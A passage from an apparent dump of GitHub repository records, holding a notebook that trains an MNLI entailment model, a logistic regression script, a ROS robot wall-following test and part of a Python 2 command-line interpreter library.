In[4]:\n\n\n#print(df[\"x1\"][0])\n#print(df[\"x2\"][0])\n\n\n# In[5]:\n\n\ndf[\"x1\"] = df[\"x1\"] + \" \" + df[\"x2\"]\ndf_valid[\"x1\"] = df_valid[\"x1\"] + \" \" + df_valid[\"x2\"]\ndf_test[\"x1\"] = df_test[\"x1\"] + \" \" + df_test[\"x2\"]\n\n\n# In[6]:\n\n\n#print(df[\"x1\"][5])\n\n\n# In[7]:\n\n\n#print(df_test['x1'][6])\n\n\n# In[8]:\n\n\n#print(df_valid['target'])\n\n\n# In[9]:\n\n\n#for row in df_test.itertuples():\n # print(row.x1)\n\n\n# In[10]:\n\n\n# convert class labels into class indices\ndata_classes = [\"entails\", \"neutral\", \"contradiction\"]\ndf['target']=df['target'].apply(data_classes.index)\ndf_valid['target']=df_valid['target'].apply(data_classes.index)\ndf_test['target']=df_test['target'].apply(data_classes.index)\n\n\n# In[11]:\n\n\n#print(df_test['target'][:15])\n\n\n# In[12]:\n\n\ndf=df.dropna()\ndf_valid=df_valid.dropna()\ndf_test=df_test.dropna()\n\n\n# In[13]:\n\n\n#df=df[:int(df.shape[0]*0.001)]\n#df_valid=df_valid[:int(df_valid.shape[0]*0.001)]\n#df_test=df_test[:int(df_test.shape[0]*0.001)]\n\n\n# In[14]:\n\n\ncol_text = 'x1'\ncol_target = 'target'\n\n\n# In[15]:\n\n\ny_train = df[col_target]\ny_test = df_test[col_target]\ny_val = df_valid[col_target]\n\n\n# In[16]:\n\n\n#print(y_val[4])\n\n\n# In[17]:\n\n\n#train_x=df[\"x1\"]\n#train_y=y_train\n\n\n# In[18]:\n\n\n#train_y.shape\n\n\n# In[19]:\n\n\n'''\nh = HNATT()\t\nh.train(train_x, train_y, \nbatch_size=16,\nepochs=16,\nembeddings_path=None)\n\n#h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n\n# print attention activation maps across sentences and words per sentence\nactivation_maps = h.activation_maps(\n'they have some pretty interesting things here. 
i will definitely go back again.')\nprint(activation_maps)\n'''\n\n\n# In[20]:\n\n\n#(train_x, train_y), (test_x, test_y) = yelp.load_data(path='yelp.csv', size=1e4)\n\n\n# In[21]:\n\n\ndef to_one_hot(labels, dim=5):\n\tresults = np.zeros((len(labels), dim))\n\tfor i, label in enumerate(labels):\n\t\tresults[i][label - 1] = 1\n\treturn results\n\n\n# In[22]:\n\n\nprint('loading training set ...')\ndf['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntrain_x = np.empty((0,))\ntrain_y = np.empty((0,))\n\ntraining_len=df['x1'].shape[0]\n\n#train_set = df[0:training_len].copy()\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntrain_x=df['text_tokens']\n#train_y=train_set['']\n\n\n\ntrain_y = to_one_hot(y_train, dim=3)\nprint(train_x[0])\nprint(train_y[0])\n\n#test_y = to_one_hot(test_y)\n\n\n# In[23]:\n\n\n# preprocess test_x , as above block\nprint('loading test set ...')\ndf_test['text_tokens']=df_test['x1'].progress_apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\ntest_x = np.empty((0,))\ntest_y = np.empty((0,))\n\ntest_x=df_test['text_tokens']\n#train_y=train_set['']\n\n\n\ntest_y = to_one_hot(y_test, dim=3)\nprint(test_x[0])\nprint(test_y[0])\n\n\n\n# In[24]:\n\n\n#preprocess val_x , as above block\nprint('loading validation set ...')\n\ndf_valid['text_tokens']=df_valid['x1'].progress_apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\nvalid_x = np.empty((0,))\nvalid_y = np.empty((0,))\n\nvalid_x=df_valid['text_tokens']\n#train_y=train_set['']\n\n\n\nvalid_y = to_one_hot(y_val, dim=3)\nprint(valid_x[0])\nprint(valid_y[0])\n\n\n# In[25]:\n\n\n# load pretrained model\nprint('loading pretrained model / restoring model ...')\nh = HNATT()\nh.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n# In[38]:\n\n\n# test on test set\n#loss_and_metrics = h.test(test_x, test_y, batch_size=64)\n#print(loss_and_metrics)\n\n\n# In[39]:\n\n\n#h.model.metrics_names\n\n\n# In[45]:\n\n\n#valid_y[0]\n\n\n# In[26]:\n\n\n#h = HNATT()\t\nh.train(train_x, train_y,valid_x,valid_y,\nbatch_size=64,\nepochs=16,\nembeddings_path=None,saved_model_dir=SAVED_MODEL_DIR,\nsaved_model_filename='mnli.h5')\n\n#h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\n\n\n\n# print attention activation maps across sentences and words per sentence\n#activation_maps = h.activation_maps(\n#'they have some pretty interesting things here. i will definitely go back again.')\n#print(activation_maps)\n\n\n# In[ ]:\n\n\n''' \nactivation_maps = h.activation_maps(\n'they have some pretty interesting things here. i will definitely go back again.')\nprint(activation_maps)\n'''\n\n\n# In[24]:\n\n\n#train_y[0]\n\n\n# In[23]:\n\n\n#h.model.summary()\n\n\n# In[9]:\n\n\n'''\ntext='he was not well, he stayed at home only. he didnt go to office '\n\nntext = normalize(text)\npreds = h.predict([ntext])[0]\nprediction = np.argmax(preds).astype(float)\nprint(prediction)\n'''\n\n\n# In[ ]:\n\n\n#he is dancing with joy because its his birthday. he is very happy\n# \n\n" } ]
2
saurabhguptarock/LogisticRegression-Pandas-Data
https://github.com/saurabhguptarock/LogisticRegression-Pandas-Data
f8471200bd64ce265ce4d108f3f13d83a23c3aa6
9d288eaeb66f2f75db444ebb9ccdc27498e7de99
448e10527f33011e1ace7f70e1f0fdb07e98d143
refs/heads/master
2020-04-12T03:27:00.019406
2018-12-18T10:00:50
2018-12-18T10:00:50
162,267,560
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4848484992980957, "alphanum_fraction": 0.5104895234107971, "avg_line_length": 18.428571701049805, "blob_id": "fe82083bc81ef7db770a8d7373fddd1c605b7ddc", "content_id": "b9c9a71010cee6082c005ee3e8f8e873265805cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2145, "license_type": "no_license", "max_line_length": 74, "num_lines": 105, "path": "/LogisticRegression Using Pandas Data Assignment.py", "repo_name": "saurabhguptarock/LogisticRegression-Pandas-Data", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndfx = pd.read_csv('logisticX.csv')\r\ndfy = pd.read_csv('logisticY.csv')\r\n\r\nX = dfx.values\r\nY = dfy.values\r\n\r\ndata = np.hstack((X, Y))\r\n\r\nnp.random.shuffle(data)\r\nsplit = int(.8 * data.shape[0])\r\n\r\nX_train = data[:split, :-1]\r\nX_test = data[split:, :-1]\r\n\r\nY_train = data[:split, -1]\r\nY_test = data[split:, -1]\r\n\r\n\r\ndef hypothesis(x, w, b):\r\n h = np.dot(x, w) + b\r\n return sigmoid(h)\r\n\r\n\r\ndef sigmoid(z):\r\n return 1.0 / (1.0 + np.exp(-1.0 * z))\r\n\r\n\r\ndef error(y_true, x, w, b):\r\n m = x.shape[0]\r\n err = 0.0\r\n\r\n for i in range(m):\r\n hx = hypothesis(x[i], w, b)\r\n err += y_true[i] * np.log2(hx) + (1 - y_true[i]) * np.log2(1 - hx)\r\n\r\n return -err / m\r\n\r\n\r\ndef get_grads(y_true, x, w, b):\r\n grad_w = np.zeros(w.shape)\r\n grad_b = 0.0\r\n\r\n m = x.shape[0]\r\n\r\n for i in range(m):\r\n hx = hypothesis(x[i], w, b)\r\n grad_w += (y_true[i] - hx) * x[i]\r\n grad_b += (y_true[i] - hx)\r\n\r\n grad_b /= m\r\n grad_w /= m\r\n return [grad_w, grad_b]\r\n\r\n\r\ndef grad_descent(x, y_true, w, b, learning_rate=0.1):\r\n err = error(y_true, x, w, b)\r\n [grad_w, grad_b] = get_grads(y_true, x, w, b)\r\n\r\n w = w + learning_rate * grad_w\r\n b = b + learning_rate * grad_b\r\n\r\n return err, w, b\r\n\r\n\r\ndef predict(x, w, b):\r\n confidence = hypothesis(x, w, b)\r\n\r\n if confidence < 0.5:\r\n return 0\r\n else:\r\n return 1\r\n\r\n\r\ndef get_acc(x_tst, y_tst, w, b):\r\n y_pred = []\r\n\r\n for i in range(y_tst.shape[0]):\r\n p = predict(x_tst[i], w, b)\r\n y_pred.append(p)\r\n\r\n y_pred = np.array(y_pred)\r\n return float((y_pred == y_tst).sum()) / y_tst.shape[0]\r\n\r\n\r\nloss = []\r\nacc = []\r\n\r\nW = np.random.random((X.shape[1],))\r\nb = np.random.random()\r\n\r\nfor i in range(1000):\r\n l, W, b = grad_descent(X_train, Y_train, W, b, learning_rate=0.5)\r\n acc.append(get_acc(X_test, Y_test, W, b))\r\n loss.append(l)\r\n\r\nplt.scatter(X[:49, 0], X[:49, 1])\r\nplt.scatter(X[50:, 0], X[50:, 1], color='orange')\r\nx = np.linspace(2, 8, 10)\r\ny = - (W[0] * x + b) / W[1]\r\nplt.plot(x, y, color='black')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.8488371968269348, "alphanum_fraction": 0.8488371968269348, "avg_line_length": 41.5, "blob_id": "e06df2b252fede92c71c872e3dd14d2d3eaa2984", "content_id": "ac733b0ad687d44518c5fbecca13f431cb4e3862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "saurabhguptarock/LogisticRegression-Pandas-Data", "src_encoding": "UTF-8", "text": "# LogisticRegression-Pandas-Data\nLogistic Regression With Algorithm With pandas data \n" } ]
2
tak-mahal/pimouse_run_corridor
https://github.com/tak-mahal/pimouse_run_corridor
c2b7afc3d61912ff15733c325e7b2065be933a40
aaaf876a4c4cfea5a247eef88bc7efeeeb0fca42
be7369239b152736d0107ba58593ed690d04e21b
refs/heads/master
2020-04-13T17:47:33.370024
2019-01-06T04:41:09
2019-01-06T04:41:09
163,356,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 143, "blob_id": "b25d4610bed704aab1aa4704b5fcdf93ed1a7b6c", "content_id": "80db89a61da4ed1c1581eae834dd3b06bf2c4cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 143, "num_lines": 1, "path": "/README.md", "repo_name": "tak-mahal/pimouse_run_corridor", "src_encoding": "UTF-8", "text": "[![Build Status](https://travis-ci.org/tak-mahal/pimouse_run_corridor.svg?branch=master)](https://travis-ci.org/tak-mahal/pimouse_run_corridor)\n" }, { "alpha_fraction": 0.567251443862915, "alphanum_fraction": 0.594298243522644, "avg_line_length": 34.07692337036133, "blob_id": "c8fa2417c1891e967a520de949c51800c668d27d", "content_id": "f08e84f6af50b42d573b87ee6ce803aa2a2a5c4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 85, "num_lines": 39, "path": "/test/travis_test_wall_around.py", "repo_name": "tak-mahal/pimouse_run_corridor", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport unittest, rostest\nimport rosnode, rospy\nimport time\n\nclass WallAroundTest(unittest.TestCase):\n def set_and_get(self,lf,ls,rs,rf):\n with open(\"/dev/rtlightsensor0\",\"w\") as f:\n f.write(\"%d %d %d %d\\n\" % (rf,rs,ls,lf))\n\n time.sleep(0.3)\n\n with open(\"/dev/rtmotor_raw_l0\",\"r\") as lf,\\\n open(\"/dev/rtmotor_raw_r0\",\"r\") as rf:\n left = int(lf.readline().rstrip())\n right = int(rf.readline().rstrip())\n\n return left, right\n\n def test_io(self):\n left, right = self.set_and_get(60,0,0,0) #front_left > 50\n self.assertTrue(left > right, \"don't turn right\")\n\n left, right = self.set_and_get(0,0,60,0) #right_side > 50\n self.assertTrue(left < right, \"don't turn left\")\n\n left, right = self.set_and_get(0,60,0,0) #left_side > 50\n self.assertTrue(left > right, \"don't turn right\")\n\n left, right = self.set_and_get(0,10,0,0) #curve to right\n self.assertTrue(left < right ,\"don't curve to left\")\n\n #left, right = self.set_and_get(0,5,0,0) #don't controll when far from wall\n #self.assertTrue(0 < left == right, \"curve wrongly\")\n\nif __name__ == '__main__':\n time.sleep(3)\n rospy.init_node('travis_test_wall_around')\n rostest.rosrun('pimouse_run_corridor', 'travis_test_wall_around', WallAroundTest)\n" } ]
2
fdumpling/practices
https://github.com/fdumpling/practices
b86a5803c6c18c53643b0700d0a575f4182c9dfb
53d3bd69bfacd7cf73635fa787b7e390b2015c1e
f1a79583a1afde2a8b7212a9a7ccbc8488603977
refs/heads/master
2015-08-04T09:03:36.639966
2014-02-24T15:24:45
2014-02-24T15:24:45
6,406,427
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344423890113831, "alphanum_fraction": 0.6426610946655273, "avg_line_length": 26.949445724487305, "blob_id": "3848606a5d6c8f3e1d20bfb42a98592efc746bf6", "content_id": "8f0ac03e8db789e645c78a5c528264ac45c5a8fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63027, "license_type": "no_license", "max_line_length": 114, "num_lines": 2255, "path": "/automation/open/lib/CLI.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.3\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\"\"\"\nProvides a standard command line interpreter for programs needing one.\nSupports different command contexts, customizable user interface, generic\nobject CLI's, and other neat stuff.\n\n\"\"\"\nfrom __future__ import generators\n\n__all__ = ['CommandQuit', 'NewCommand', 'BaseCommands',\n'DictCLI', 'GenericCLI', 'FileCLI', 'Completer', 'Shell', 'ConsoleIO', 'Theme',\n'DefaultTheme', 'UserInterface', 'CommandParser', 'globargv', 'breakout_args',\n'clieval', 'get_generic_cmd', 'get_generic_clone', 'get_generic_cli',\n'run_cli_wrapper', 'run_cli', 'run_generic_cli', 'get_cli']\n\nimport sys, os, time\nfrom cStringIO import StringIO\n\ntry:\n\timport readline # readline is very, very important to us...\n\tPROMPT_START_IGNORE = '\\001'\n\tPROMPT_END_IGNORE = '\\002'\nexcept ImportError:\n\treadline = None # ...but try to live without it if it is not available.\n\tPROMPT_START_IGNORE = ''\n\tPROMPT_END_IGNORE = ''\n\nimport nmsgetopt\nimport termtools\nimport cliutils\nimport environ\nfrom fsm import FSM, ANY\n\n# global timer for timing methods\nimport scheduler\ntimer = scheduler.get_scheduler()\ndel scheduler\n\nMethodType = type(timer.sleep) # cheat\n_DEBUG = False\n\n\nclass CLIException(Exception):\n\tdef __init__(self, value=None):\n\t\tself.value = value\n\nclass CommandQuit(CLIException):\n\t\"\"\"An exception that is used to signal quiting from a command object. \"\"\"\n\tpass\nclass CommandExit(CLIException):\n\t\"\"\"An exception that is used to signal exiting from the command object. The\n\tcommand is not popped. \"\"\"\n\tpass\nclass NewCommand(CLIException):\n\t\"\"\"Used to signal the parser to push a new command object.\nRaise this with an instance of BaseCommands as a value.\"\"\"\n\tpass\nadd_exception(CommandQuit)\nadd_exception(CommandExit)\nadd_exception(NewCommand)\n\nclass BaseCLI(object):\n\t\"\"\"A base class that defines a holder object for command methods. It dispatches\nthe methods when you call it with an argv-style list of arguments. The first\nargument must match a name of a method.\n\"\"\"\n\tdef __init__(self, ui, aliases=None):\n\t\t# initialize local variables\n\t\tself._aliases = aliases or {}\n\t\tself._command_list = None\n\t\tself._repeater = None\n\t\tself._completion_scopes = {}\n\t\tself._completers = []\n\t\tself._obj = None # may be in instance of some interface commands may use.\n\t\tself.set_userinterface(ui)\n\t\tself.initialize()\n\n\t# optional extra initialization. Override in subclass if desired.\n\tdef initialize(self):\n\t\tpass\n\n\t# optional finalize method. 
called when CLI quits.\n\tdef finalize(self):\n\t\tpass\n\n\tdef set_userinterface(self, ui):\n\t\tself._ui = ui\n\t\t# map in user interface input and output for speed\n\t\tself._user_input = ui.user_input\n\t\tself._more_user_input = ui.more_user_input\n\t\tself._print = ui.Print\n\t\tself._printf = ui.printf\n\t\tself._pprint = ui.pprint\n\t\tself._format = ui.format\n\t\tself._print_list = ui.print_list\n\t\tself._set_theme = ui.set_theme\n\t\tself._environ = ui._env\n\n\t# override this and call it for command sets the need post-instantiation setup.\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # an object to call methods on, if needed\n\t\tself._environ[\"PS1\"] = \"%s> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _reset_scopes(self):\n\t\tpass\n\n\t# overrideable exception hook method - do something with command exceptions.\n def except_hook(self, ex, val, tb):\n\t\tglobal _DEBUG\n\t\tif _DEBUG:\n\t\t\timport debugger\n\t\t\tdebugger.post_mortem(ex, val, tb)\n\t\telse:\n \tself._ui.error(\"%s (%s)\" % (ex, val))\n\n\t# override this if your subcommand passes something useful back\n\t# via a parameter to the CommandQuit exception. \n\tdef handle_subcommand(self, value):\n\t\tpass\n\n\t# override this for default actions\n\tdef default_command(self, argv):\n\t\tself._ui.error(\"unknown command: %r\" % (argv[0]))\n\t\treturn 2\n\n\t# completer management methods\n\tdef add_completion_scope(self, name, complist):\n\t\tself._completion_scopes[name] = list(complist)\n\n\tdef get_completion_scope(self, name=\"commands\"):\n\t\treturn self._completion_scopes.get(name, [])\n\n\tdef remove_completion_scope(self, name):\n\t\tdel self._completion_scopes[name]\n\n\tdef push_completer(self, namespace):\n\t\tif readline:\n\t\t\torig = readline.get_completer()\n\t\t\tif orig is not None:\n\t\t\t\tself._completers.append(orig)\n\t\t\treadline.set_completer(Completer(namespace).complete)\n\n\tdef pop_completer(self):\n\t\tif readline:\n\t\t\tif self._completers:\n\t\t\t\tc = self._completers.pop()\n\t\t\t\treadline.set_completer(c)\n\n\t# convenient access to option parsing.\n\tdef getopt(self, argv, shortopts):\n\t\treturn nmsgetopt.getopt(argv[1:], shortopts)\n\t\t# returns: optlist, longoptdict, args\n\n\t# dispatch commands by calling the instance\n\tdef __call__(self, argv):\n\t\tif not argv or not argv[0] or argv[0].startswith(\"_\"):\n\t\t\treturn 2\n\t\targv = self._expand_aliases(argv)\n\t\t# special escape characters...\n\t\tif argv[0].startswith(\"#\"): # comment\n\t\t\treturn 0\n\t\ttry:\n\t\t\tmeth = getattr(self, argv[0])\n\t\texcept AttributeError:\n\t\t\treturn self.default_command(argv)\n\t\t# ...and exec it.\n\t\ttry:\n\t\t\trv = meth(argv) # call the method\n\t\texcept (NewCommand, CommandQuit, CommandExit, KeyboardInterrupt):\n\t\t\traise # pass these through to parser\n\t\texcept IndexError: # tried to get non-existent argv value\n\t\t\tself._print(meth.__doc__)\n\t\texcept GetoptError, err:\n\t\t\tself._print(\"option %r: %s\" % (err.opt, err.msg))\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\tself.except_hook(ex, val, tb)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._environ[\"?\"] = int(rv)\n\t\t\texcept (ValueError, TypeError, AttributeError):\n\t\t\t\tself._environ[\"?\"] = 99\n\t\t\tself._environ[\"_\"] = rv\n\t\t\treturn rv\n\n\tdef _expand_aliases(self, argv):\n\t\tseen = {}\n\t\twhile 1:\n\t\t\talias = self._aliases.get(argv[0], None)\n\t\t\tif alias:\n\t\t\t\tif alias[0] in seen:\n\t\t\t\t\tbreak # alias loop\n\t\t\t\tseen[alias[0]] = 
True\n\t\t\t\t# do the substitution\n\t\t\t\tdel argv[0]\n\t\t\t\trl = alias[:]\n\t\t\t\trl.reverse()\n\t\t\t\tfor arg in rl:\n\t\t\t\t\targv.insert(0, arg)\n\t\t\telse:\n\t\t\t\tbreak\n\t\treturn argv\n\n\tdef _export(self, name, val):\n\t\t\"\"\"put a name-value pair in the environment.\"\"\"\n\t\tself._environ[name] = val\n\n\t# Start a new BaseCommands (or subclass), with the same environment.\n\t# The new command object gets a copy of the environment, but the same aliases.\n\tdef clone(self, cliclass=None, theme=None):\n\t\tif cliclass is None:\n\t\t\tcliclass = self.__class__\n\t\tnewui = self._ui.clone(theme)\n\t\treturn cliclass(newui, self._aliases)\n\n\tdef subshell(self, io, env=None, aliases=None, theme=None):\n\t\tcliclass = self.__class__\n\t\tnewui = UserInterface(io, env or self._environ.copy(), theme)\n\t\taliases = aliases or self._aliases\n\t\treturn cliclass(newui, aliases)\n\n\tdef get_commands(self):\n\t\tif self._command_list is None:\n\t\t\thashfilter = {}\n\t\t\tfor name in filter(self._command_filt, dir(self)):\n\t\t\t\t## this filters out aliases (same function id)\n\t\t\t\tmeth = getattr(self, name)\n\t\t\t\thashfilter[id(meth.im_func)] = meth.im_func.func_name\n\t\t\tself._command_list = hashfilter.values()\n\t\t\tself._command_list.sort()\n\t\treturn self._command_list\n\n\t# user visible commands are methods that don't have a leading underscore,\n\t# and do have a docstring.\n\tdef _command_filt(self, objname):\n\t\tif objname.startswith(\"_\"):\n\t\t\treturn 0\n\t\tobj = getattr(self, objname)\n\t\tif type(obj) is MethodType and obj.__doc__:\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\n\tdef commandlist(self, argv):\n\t\tself._print_list(self.get_commands())\n\n\t# most basic standard commands follow\n\tdef unset(self, argv):\n\t\t\"\"\"unset <envar>\n Unsets the environment variable.\"\"\"\n\t\ttry:\n\t\t\tdel self._environ[argv[1]]\n\t\texcept:\n\t\t\treturn 1\n\n\tdef setenv(self, argv):\n\t\t\"\"\"setenv NAME VALUE\n Sets the environment variable NAME to VALUE, ala C shell. \"\"\"\n\t\tif len(argv) < 3:\n\t\t\tself._print(self.setenv.__doc__)\n\t\t\treturn\n\t\tself._environ[argv[1]] = argv[2]\n\t\treturn self._environ[\"_\"]\n\n\tdef echo(self, argv):\n\t\t\"\"\"echo ...\n Echoes arguments back.\t\"\"\"\n\t\tself._print(\" \".join(argv[1:]))\n\t\treturn self._environ[\"_\"]\n\n\tdef printf(self, argv):\n\t\t\"\"\"printf [<format>] <args>....\n Print the arguments according to the format, \n or all arguments if first is not a format string.\"\"\"\n\t\tif argv[1].find(\"%\") >= 0:\n\t\t\ttry:\n\t\t\t\tns = vars(self._obj)\n\t\t\texcept:\n\t\t\t\tns = globals()\n\t\t\targs, kwargs = breakout_args(argv[2:], ns)\n\t\t\tself._print(str(argv[1]) % args)\n\t\telse:\n\t\t\tself._print(\" \".join(argv[1:]))\n\n\tdef exit(self, argv):\n\t\t\"\"\"exit\n Exits this command interpreter instance. \"\"\"\n\t\traise CommandQuit\n\tquit = exit\n\n\tdef printenv(self, argv):\n\t\t\"\"\"printenv [name ...]\n Shows the shell environment that processes will run with. 
\"\"\"\n\t\tif len(argv) == 1:\n\t\t\tnames = self._environ.keys()\n\t\t\tnames.sort()\n\t\t\tms = reduce(max, map(len, names))\n\t\t\tfor name in names:\n\t\t\t\tvalue = self._environ[name]\n\t\t\t\tself._print(\"%*s = %s\" % (ms, name, _safe_repr(value, {}, None, 0)))\n\t\telse:\n\t\t\ts = []\n\t\t\tfor name in argv[1:]:\n\t\t\t\ttry:\n\t\t\t\t\ts.append(\"%s=%s\" % (name, _safe_repr(self._environ[name], {}, None, 0)))\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\tself._print(\"\\n\".join(s))\n\n\tdef history(self, argv):\n\t\t\"\"\"history [<index>]\n Display the current readline history buffer.\"\"\"\n\t\tif not readline:\n\t\t\tself._print(\"The readline library is not available.\")\n\t\t\treturn\n\t\tif len(argv) > 1:\n\t\t\tidx = int(argv[1])\n\t\t\tself._print(readline.get_history_item(idx))\n\t\telse:\n\t\t\tfor i in xrange(readline.get_current_history_length()):\n\t\t\t\tself._print(readline.get_history_item(i))\n\n\tdef export(self, argv):\n\t\t\"\"\"export NAME=VAL\n Sets environment variable that new processes will inherit.\n\t\"\"\"\n\t\tfor arg in argv[1:]:\n\t\t\ttry:\n\t\t\t\tself._environ.export(arg)\n\t\t\texcept:\n\t\t\t\tex, val = sys.exc_info()[:2]\n\t\t\t\tself._print(\"** could not set value: %s (%s)\" % (ex, val))\n\t\n\tdef help(self, argv):\n\t\t\"\"\"help [-lLcia] [<commandname>]...\n Print a list of available commands, or information about a command,\n if the name is given. Options:\n -l Shows only local (object specific) commands.\n -c Shows only the dynamic commands.\n -L shows only local and dynamic commands.\n -i Shows only the inherited commands from the parent context.\n -a Shows all commands (default)\n\t\t\"\"\"\n\t\tlocal=True ; created=True ; inherited=True\n\t\topts, longs, args = self.getopt(argv, \"lLcia\")\n\t\tfor opt, optarg in opts:\n\t\t\tif opt ==\"-i\":\n\t\t\t\tlocal=False ; created=False ; inherited=True\n\t\t\telif opt == \"-c\":\n\t\t\t\tlocal=False ; created=True ; inherited=False\n\t\t\telif opt == \"-l\":\n\t\t\t\tlocal=True ; created=False ; inherited=False\n\t\t\telif opt == \"-a\":\n\t\t\t\tlocal=True ; created=True ; inherited=True\n\t\t\telif opt == \"-L\":\n\t\t\t\tlocal=True ; created=True ; inherited=False\n\t\tif not args:\n\t\t\targs = self.get_commands()\n\t\tfor name in args:\n\t\t\ttry:\n\t\t\t\tdoc = getattr(self, name).__doc__\n\t\t\texcept AttributeError:\n\t\t\t\tself._print(\"No command named %r found.\" % (name,))\n\t\t\t\tcontinue\n\t\t\tif not doc:\n\t\t\t\tself._print(\"No docs for %r.\" % (name,))\n\t\t\telif local and self.__class__.__dict__.has_key(name):\n\t\t\t\tself._ui.help_local(doc)\n\t\t\telif created and \"*\" in doc: # dynamic method from generic_cli\n\t\t\t\tself._ui.help_created(doc)\n\t\t\telif inherited:\n\t\t\t\tself._ui.help_inherited(doc)\n\n\tdef unalias(self, argv):\n\t\t\"\"\"unalias <alias>\n Remove the named alias from the alias list.\"\"\"\n\t\tif len(argv) < 2:\n\t\t\tself._print(self.unalias.__doc__)\n\t\t\treturn\n\t\ttry:\n\t\t\tdel self._aliases[argv[1]]\n\t\texcept:\n\t\t\tself._print(\"unalias: %s: not found\" % argv[1])\n\n\tdef alias(self, argv):\n\t\t\"\"\"alias [newalias]\n With no argument prints the current set of aliases. With an argument of the\n form alias ..., sets a new alias. 
\"\"\"\n\t\tif len(argv) == 1:\n\t\t\tfor name, val in self._aliases.items():\n\t\t\t\tself._print(\"alias %s='%s'\" % (name, \" \".join(val)))\n\t\t\treturn 0\n\t\telif len(argv) == 2 and '=' not in argv[1]:\n\t\t\tname = argv[1]\n\t\t\ttry:\n\t\t\t\tself._print(\"%s=%s\" % (name, \" \".join(self._aliases[name])))\n\t\t\texcept KeyError:\n\t\t\t\tself._print(\"undefined alias.\")\n\t\t\treturn 0\n\t\t# else\n\t\ttry: # this icky code to handle different permutations of where the '=' is.\n\t\t\targv.pop(0) # discard 'alias'\n\t\t\tname = argv.pop(0)\n\t\t\tif \"=\" in name:\n\t\t\t\tname, rh = name.split(\"=\", 1)\n\t\t\t\targv.insert(0,rh)\n\t\t\telif argv[0].startswith(\"=\"):\n\t\t\t\tif len(argv[0]) > 1: # if argv[1] is '=something'\n\t\t\t\t\targv[0] = argv[0][1:]\n\t\t\t\telse:\n\t\t\t\t\tdel argv[0] # remove the '='\n\t\t\tself._aliases[name] = argv\n\t\texcept:\n\t\t\tex, val = sys.exc_info()[:2]\n\t\t\tself._print(\"alias: Could not set alias. Usage: alias name=value\")\n\t\t\tself._print(\"%s (%s)\" % (ex, val))\n\t\t\treturn 1\n\n\tdef sleep(self, argv):\n\t\t\"\"\"sleep <secs>\n Sleeps for <secs> seconds.\"\"\"\n\t\tsecs = int(argv[1])\n\t\ttimer.sleep(secs)\n\tdelay = sleep # alias\n\n\tdef stty(self, argv):\n\t\t\"\"\"stty <args>\n Sets or clears tty flags. May also use \"clear\", \"reset\", \"sane\". \"\"\"\n\t\tself._print(termtools.stty(self._ui._io.fileno(), *tuple(argv[1:])))\n\n\tdef debug(self, argv):\n\t\t\"\"\"debug [\"on\"|\"off\"]\n\tEnables debugging for CLI code. Enters debugger is an exception occurs.\"\"\"\n\t\tglobal _DEBUG\n\t\tif len(argv) > 1:\n\t\t\tcmd = argv[1]\n\t\t\tif cmd == \"on\":\n\t\t\t\t_DEBUG = True\n\t\t\telse:\n\t\t\t\t_DEBUG = False\n\t\telse:\n\t\t\tself._print(\"Debugging is currently \", IF(_DEBUG, \"on\", \"off\"), \".\")\n\t\t\n\tdef python(self, argv):\n\t\timport code\n\t\tns = self._get_ns()\n\t\tconsole = code.InteractiveConsole(ns)\n\t\tconsole.raw_input = self._ui.user_input\n\t\ttry:\n\t\t\tsaveps1, saveps2 = sys.ps1, sys.ps2\n\t\texcept AttributeError:\n\t\t\tsaveps1, saveps2 = \">>> \", \"... \"\n\t\tsys.ps1, sys.ps2 = \"%%GPython%%N:%s> \" % (self._obj.__class__.__name__,), \"more> \"\n\t\tif readline:\n\t\t\toc = readline.get_completer()\n\t\t\treadline.set_completer(Completer(ns).complete)\n\t\tconsole.interact(\"You are now in Python. 
